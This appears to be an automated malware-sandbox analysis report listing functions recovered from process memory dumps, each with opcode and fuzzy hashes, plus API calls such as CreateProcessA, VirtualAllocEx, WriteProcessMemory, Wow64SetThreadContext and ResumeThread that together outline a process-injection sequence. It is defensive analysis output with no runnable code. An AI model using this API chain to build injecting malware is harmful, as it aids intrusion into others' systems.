                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E3B88, Relevance: .3, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9733d53d4903d4f86056c9a390de2457c719f6ac101ae38e56de9d8c909ffd40
                                                                                        • Instruction ID: 88dbc9605e37032c7b967b0dd6a237653b429927081227f3fcf92f32406008f3
                                                                                        • Opcode Fuzzy Hash: 9733d53d4903d4f86056c9a390de2457c719f6ac101ae38e56de9d8c909ffd40
                                                                                        • Instruction Fuzzy Hash: 7BB15A70E092888FCB09CFA9C8945DDFFB2BF89300F24946AD455AB261D7359A45CF11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E3C28, Relevance: .2, Instructions: 201COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8888f178a85592dba4427fe5d38cdbff7ddd8ca808bedefe68a9c99eaeb448e
                                                                                        • Instruction ID: a261bd8642f20de11d1f62f79cb89069c57f65a1106a083d262d0d7194a184c9
                                                                                        • Opcode Fuzzy Hash: d8888f178a85592dba4427fe5d38cdbff7ddd8ca808bedefe68a9c99eaeb448e
                                                                                        • Instruction Fuzzy Hash: 5981D374E046088FDB08CFEAC9946AEFBB2BF88310F24952AD415BB364D7359905CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E44A0, Relevance: .2, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e14d5c16d36b8f900bd5a8b7865180136f25479d30cc96f899fab30ec57db92e
                                                                                        • Instruction ID: e62ff6b337d332ede4261919728921b2360055a0aaddd0a4b5808645ce990690
                                                                                        • Opcode Fuzzy Hash: e14d5c16d36b8f900bd5a8b7865180136f25479d30cc96f899fab30ec57db92e
                                                                                        • Instruction Fuzzy Hash: AF513870E046598FCB08CFAAC9405AEFBF2FF89300F25C56AD419B7265D7349A41DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E3070, Relevance: .1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5640982490f5c73a1a9f4ea6992169b11cba343004df377f1581af05bf8c9a40
                                                                                        • Instruction ID: 446913cc0730ea7caa056ec4ba66f8aed199e5372b9217b6e866747ca50fcd10
                                                                                        • Opcode Fuzzy Hash: 5640982490f5c73a1a9f4ea6992169b11cba343004df377f1581af05bf8c9a40
                                                                                        • Instruction Fuzzy Hash: B4411771E056489FDB18CFABD85069EFBF3AFC9300F14C0AAC419AB265DB305A458F61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E4EF1, Relevance: .1, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b28cac6297a00cbceb14cd9b7f447b74c6b426b915515358873b2b23c4290257
                                                                                        • Instruction ID: fb25b7b0195f36981667c3e66c2bf8dbc43acad0cf82cbdd6226b628b98d1a8a
                                                                                        • Opcode Fuzzy Hash: b28cac6297a00cbceb14cd9b7f447b74c6b426b915515358873b2b23c4290257
                                                                                        • Instruction Fuzzy Hash: 1231C6B1E016588BDB18CFABD9542DEFBF7AFC9301F18C06AD409AA264DB341A45CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001ECD8C, Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001ED05F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: dde2ab25f6d843cf9b7b17cf5fc301792adc3500b8a32173b807abc16ddfb030
                                                                                        • Instruction ID: 99a3a474dc2201426d221b572e1710f38b669856b4e5dbf7af80b05973ddaee6
                                                                                        • Opcode Fuzzy Hash: dde2ab25f6d843cf9b7b17cf5fc301792adc3500b8a32173b807abc16ddfb030
                                                                                        • Instruction Fuzzy Hash: 67C13370D006698FDB20DFA5CC41BEEBBB1BF49304F1091A9E919B7250DB749A86CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001ECD98, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001ED05F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 5212af32d670a0aeb958f6b68c30d68bb1b58b80136ed54aafb85e5ee4a2e1fe
                                                                                        • Instruction ID: 119cc3822d150a76e4a0690886055587c16aa789c8a83dcb22005ed126be3dae
                                                                                        • Opcode Fuzzy Hash: 5212af32d670a0aeb958f6b68c30d68bb1b58b80136ed54aafb85e5ee4a2e1fe
                                                                                        • Instruction Fuzzy Hash: 1DC13370D006698FDB20DFA5CC41BEEBBB1BF49304F1091A9E919B7240DB749A86CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EC9F9, Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001ECAD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 1d8ee17da4e322095e935a8c86ae5981109edfce3f4d7edcbb0674b39e10a2cd
                                                                                        • Instruction ID: 8fafb0999edccbdab3aaed4044920376e64919654da1cd8d011ec62c4a4aefb1
                                                                                        • Opcode Fuzzy Hash: 1d8ee17da4e322095e935a8c86ae5981109edfce3f4d7edcbb0674b39e10a2cd
                                                                                        • Instruction Fuzzy Hash: BE41A9B5D012589FCF00CFA9D884AEEBBB1BF49314F20942AE814B7250D774AA45CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001ECA00, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001ECAD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: aa60334fd83d1f1ef47a159d167e43858cafea0cf60b828c881619a684769ab5
                                                                                        • Instruction ID: 9ed30d077332a1864fa19015a4f53d30096b342bf90818958cd190f8e3fe9a5e
                                                                                        • Opcode Fuzzy Hash: aa60334fd83d1f1ef47a159d167e43858cafea0cf60b828c881619a684769ab5
                                                                                        • Instruction Fuzzy Hash: 4741ABB4D012589FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D775AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EC8C2, Relevance: 1.6, APIs: 1, Instructions: 114memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001EC982
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 56a1da560dfed28e55c20c9211b014d3727423c9b0cd8d5baa156fbc5811717f
                                                                                        • Instruction ID: 5c39d6dbc6c76d26653cd22b728c5a0e701f1dd77c2ec131f6eae6580ced9748
                                                                                        • Opcode Fuzzy Hash: 56a1da560dfed28e55c20c9211b014d3727423c9b0cd8d5baa156fbc5811717f
                                                                                        • Instruction Fuzzy Hash: 3D41BAB8D042489FCF10CFA9E884AEEFBB1BF49314F20941AE815B7211D735A916CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001ECB60, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001ECC12
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: c51e0c53898d911bcd0362c42c22ab80d50b8b8e0539902f09fc940297f24cc6
                                                                                        • Instruction ID: e9db7bd8f3a9aa2d11c87bf352cde1367672168d02e826e4ab07016c98c08951
                                                                                        • Opcode Fuzzy Hash: c51e0c53898d911bcd0362c42c22ab80d50b8b8e0539902f09fc940297f24cc6
                                                                                        • Instruction Fuzzy Hash: CA41ABB4D042589FCF10CFAAD884AEEFBB1BF49314F20942AE815B7240D775A945CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EC8D8, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001EC982
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: fcd91a08f918764535edf09fec26ba15f2212f7d87ed714f327a2d6d05eee152
                                                                                        • Instruction ID: 3c2811ccfe85871951a081902ddd7c0573002577c9c50fd54064718a381d6bc8
                                                                                        • Opcode Fuzzy Hash: fcd91a08f918764535edf09fec26ba15f2212f7d87ed714f327a2d6d05eee152
                                                                                        • Instruction Fuzzy Hash: A94199B8D042589FCF10CFA9E880ADEFBB1BB49314F20942AE815B7310D735A906CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EC1A8, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001EC257
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 542c0688507e04f74c56152473aac9d52d382406529709de87a2f20be49c67fa
                                                                                        • Instruction ID: eb6ca78e52e290da33a7e9414021e83af212b1bdd88fa903dec2746fc8c973b2
                                                                                        • Opcode Fuzzy Hash: 542c0688507e04f74c56152473aac9d52d382406529709de87a2f20be49c67fa
                                                                                        • Instruction Fuzzy Hash: 1641BDB4D002599FCB10DFEAD884ADEBBF0BB49314F24842AE415B7240D738A946CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EC0B0, Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 001EC136
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 610dbd2533f33ea34a08b78ea6afb3d5b5ec61b34a39bd93c497feaec1235b91
                                                                                        • Instruction ID: cdfb227b23f53524194c0d0023a5b0e7a7c74fddc992bcb67d9abb2d3f6e95b6
                                                                                        • Opcode Fuzzy Hash: 610dbd2533f33ea34a08b78ea6afb3d5b5ec61b34a39bd93c497feaec1235b91
                                                                                        • Instruction Fuzzy Hash: 8631CCB5D052589FCF14CFA9E884ADEFBB0BB49314F24842AE815B7300D735A906CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EC0B8, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 001EC136
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 6a0c287b8ab38a1ae58547db8620bd15eacd4243296757d22223b9d6a3ed6bb7
                                                                                        • Instruction ID: 1e2413df0555d546c87e143c7856160141017be612b8f5e0892e2aa262a58ee7
                                                                                        • Opcode Fuzzy Hash: 6a0c287b8ab38a1ae58547db8620bd15eacd4243296757d22223b9d6a3ed6bb7
                                                                                        • Instruction Fuzzy Hash: 4B319BB4D052589FCF14CFA9E884A9EFBB4BB49314F24942AE815B7340DB75A902CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017D1D4, Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479667243.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cb365044cbeb42da076903ddc4b8607f9961551f4e730869bb5956059ee57a90
                                                                                        • Instruction ID: 9e231d1e3dd707cd27ffaef8173c6d918626c7778b3f8e00dc416797e525f94f
                                                                                        • Opcode Fuzzy Hash: cb365044cbeb42da076903ddc4b8607f9961551f4e730869bb5956059ee57a90
                                                                                        • Instruction Fuzzy Hash: 7F21F271604208EFDB05DF20E9C0B26BBB5FF88318F24C5A9E9094B247C336D847CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479667243.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c47bedbe51074358ec4975f6af865dbceb5b99765579d0d2e87129aaef4ab3c6
                                                                                        • Instruction ID: ca57bad3e7ef0e86c9a16562da4a25ced9222f1b974da334ebe9a2f98bf376f7
                                                                                        • Opcode Fuzzy Hash: c47bedbe51074358ec4975f6af865dbceb5b99765579d0d2e87129aaef4ab3c6
                                                                                        • Instruction Fuzzy Hash: D821F275604208EFDB15DF24E984B26BBB5EF88318F34C5A9E80D4B246C73AD847CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479667243.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 09a5079bddb9163ee8e9a4277b1e581522886afa465c44657de10ff5e27745e3
                                                                                        • Instruction ID: 426b886f58881f016d3d0a9a9a1ad21b23fd485aedd6a3a79c1b1f7196c9fefb
                                                                                        • Opcode Fuzzy Hash: 09a5079bddb9163ee8e9a4277b1e581522886afa465c44657de10ff5e27745e3
                                                                                        • Instruction Fuzzy Hash: 9C218E755093848FCB12CF20E994715BF71EF46314F28C5EAD8498B2A7C33AD80ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017D1CF, Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479667243.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c4fb8ff374167374b7307723662c2f1a25cf829ef7f15f37dbec8f84c6ff04db
                                                                                        • Instruction ID: 306c558f6a1239d23570489b432a172009f8a742fa8a29ae044ca55c8a5a311c
                                                                                        • Opcode Fuzzy Hash: c4fb8ff374167374b7307723662c2f1a25cf829ef7f15f37dbec8f84c6ff04db
                                                                                        • Instruction Fuzzy Hash: 74118B75544284DFCB12CF10E5C4B15BFB1FF84314F28C6AAD8494B656C33AD84ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016D1D5, Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479614182.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 256d936f52868c387dcd84bceaa55661152c949b61cf6eed11dad42551810f87
                                                                                        • Instruction ID: 39c8361ea929171281bd9e2f09c35f8f83f30dfe32d58e2e2fc776f836831ddc
                                                                                        • Opcode Fuzzy Hash: 256d936f52868c387dcd84bceaa55661152c949b61cf6eed11dad42551810f87
                                                                                        • Instruction Fuzzy Hash: 0601D631A083409AE7109F26EC94B77BBD8EF56764F29C45EEE045A283C778DC41DAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016D1D4, Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479614182.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 580419d3aa92bf6eedf717b8f71c81ee9baa594599c5c90572254a8f36be93e7
                                                                                        • Instruction ID: 445d7158f9308e90b9d9aff2a3c9f31327750aec918bf964a51e43c9ac5710b3
                                                                                        • Opcode Fuzzy Hash: 580419d3aa92bf6eedf717b8f71c81ee9baa594599c5c90572254a8f36be93e7
                                                                                        • Instruction Fuzzy Hash: 16F06D71904740AAEB108E16DC88B63FFD8EB91724F28C45EED485B296C778EC45CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 001EC2C7, Relevance: 4.0, Strings: 3, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: MYG$MYG$MYG
                                                                                        • API String ID: 0-4256688356
                                                                                        • Opcode ID: 0408bdb3211c92ba7a694aa0cb1ad501fca6f5697abd89d2541eb76126f4bd67
                                                                                        • Instruction ID: 698e600340bdb713bb11bf623655542c6b08801f3a0c63dbd82f06e361f13cad
                                                                                        • Opcode Fuzzy Hash: 0408bdb3211c92ba7a694aa0cb1ad501fca6f5697abd89d2541eb76126f4bd67
                                                                                        • Instruction Fuzzy Hash: 2ED13D74E046598FCB14CFA9C980AAEFBB2FF89304F248169D509AB355D7309E42CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E68A8, Relevance: 3.9, Strings: 3, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -u$0o.S$0o.S
                                                                                        • API String ID: 0-3828147270
                                                                                        • Opcode ID: 215521735ab12c43c98d97f02d07301b6dee2aaff3c5d9e9719d7cfcbf016f83
                                                                                        • Instruction ID: b4b9d2b96ebdcf8be7142205431e05336a7d4f90384d993d49397610d36706aa
                                                                                        • Opcode Fuzzy Hash: 215521735ab12c43c98d97f02d07301b6dee2aaff3c5d9e9719d7cfcbf016f83
                                                                                        • Instruction Fuzzy Hash: C751A170E05689DFCB08CFA6C5915AEFBB2FBA5344FA4846AC405A7205D7349A81CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EAC0A, Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -$ $A_
                                                                                        • API String ID: 0-1870412770
                                                                                        • Opcode ID: f130108a086b1f00fe7f1e05570a7d1304734ac9847330784ce02c280c00c5ee
                                                                                        • Instruction ID: 5c41700772472385f0082999134b842bba461ea1400f7ef8d287840022e0ff10
                                                                                        • Opcode Fuzzy Hash: f130108a086b1f00fe7f1e05570a7d1304734ac9847330784ce02c280c00c5ee
                                                                                        • Instruction Fuzzy Hash: 55718D70E0564ADFCB08CFEAD4815EEFBF2AF88710F64D426D415AB254D334AA419F92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E6BA8, Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GuA
                                                                                        • API String ID: 0-3525248067
                                                                                        • Opcode ID: f11295052e4eac257ec21f827579b6077854d92e5e102c47bce095a0c57463dd
                                                                                        • Instruction ID: 4468bab56ed21d4343671adac51bf1dc6a782019a52f0dbec71f8529bb0a04ce
                                                                                        • Opcode Fuzzy Hash: f11295052e4eac257ec21f827579b6077854d92e5e102c47bce095a0c57463dd
                                                                                        • Instruction Fuzzy Hash: 9681F074E10659CFCB44CFAAC9848AEFBF1FF88350F658569E415AB220D334AA42CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E6B9A, Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GuA
                                                                                        • API String ID: 0-3525248067
                                                                                        • Opcode ID: dc5298b2972f760ed624498477076849af5af96ffad267438a26d8616a55e7ea
                                                                                        • Instruction ID: 4dd7587198ad60950efa25af8bc41c1894ac7bd03d38471656e63003125570ac
                                                                                        • Opcode Fuzzy Hash: dc5298b2972f760ed624498477076849af5af96ffad267438a26d8616a55e7ea
                                                                                        • Instruction Fuzzy Hash: 7F81F474A14659CFCB44CFAAC98089EFBF1FF89350F6585AAD415EB220D334AA42CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E7F80, Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <[`
                                                                                        • API String ID: 0-4103397427
                                                                                        • Opcode ID: 440a26aa075abfe0b79244f4ec8bc3c9c5d8ce4cb1a1f7967bb092c71552a80b
                                                                                        • Instruction ID: 1661e57444a46842b3859e388dd47b3cac688e98a63a467208ec149d9356d125
                                                                                        • Opcode Fuzzy Hash: 440a26aa075abfe0b79244f4ec8bc3c9c5d8ce4cb1a1f7967bb092c71552a80b
                                                                                        • Instruction Fuzzy Hash: D171E570E19609CFCB48CF9AC5849DEFBF2EF89310F24942AE415B7264D7349A42CB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EA748, Relevance: .3, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f26f7a70fe3558cee0ca3a9f9b280428130449f40f4a1a5cc7a44d59f17840f
                                                                                        • Instruction ID: 558da38372b447063fcb909b86ac0cc15db40d9a9d48aba29ed96d2347b301f6
                                                                                        • Opcode Fuzzy Hash: 7f26f7a70fe3558cee0ca3a9f9b280428130449f40f4a1a5cc7a44d59f17840f
                                                                                        • Instruction Fuzzy Hash: 5EB10470E05659CFCB08CFEAC5409DEFBF2AF88311F65852AD409AB254E734A942CB65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E13B0, Relevance: .2, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 14890ca81f45421a459f4c584d8b66fca213c7f52cf09f496b70feff732190fe
                                                                                        • Instruction ID: c8394e939bec1ed97ac4fb31c72aa6b58d4b3343680dd6174dd6265a6663f0f9
                                                                                        • Opcode Fuzzy Hash: 14890ca81f45421a459f4c584d8b66fca213c7f52cf09f496b70feff732190fe
                                                                                        • Instruction Fuzzy Hash: 74612570E0161ADFCB48CFA6C8816EEBBB2FF89310F64952AD416B7354D7349A42CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E7D38, Relevance: .1, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: baee374aba40ddb1ebd6132e85151665ccbfbaf45077db23c2471a3cea3ff3b7
                                                                                        • Instruction ID: f8a161fc0dc88236fb8f9fea8b96e2151ed0635f4d33520f9f8a33d5c4359880
                                                                                        • Opcode Fuzzy Hash: baee374aba40ddb1ebd6132e85151665ccbfbaf45077db23c2471a3cea3ff3b7
                                                                                        • Instruction Fuzzy Hash: 4241F870E0865A9FDB08CFE6C9815AEFBF2BF88310F28C46AC415A7254D3749A41CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E7D48, Relevance: .1, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bfecd78659e1554283f11a98a106c94ec172c3de3acfa593174347ddd409bb30
                                                                                        • Instruction ID: 6a896c9893d39c8b015749427466d7fe670811fb70a8c8e60fc855de734ab183
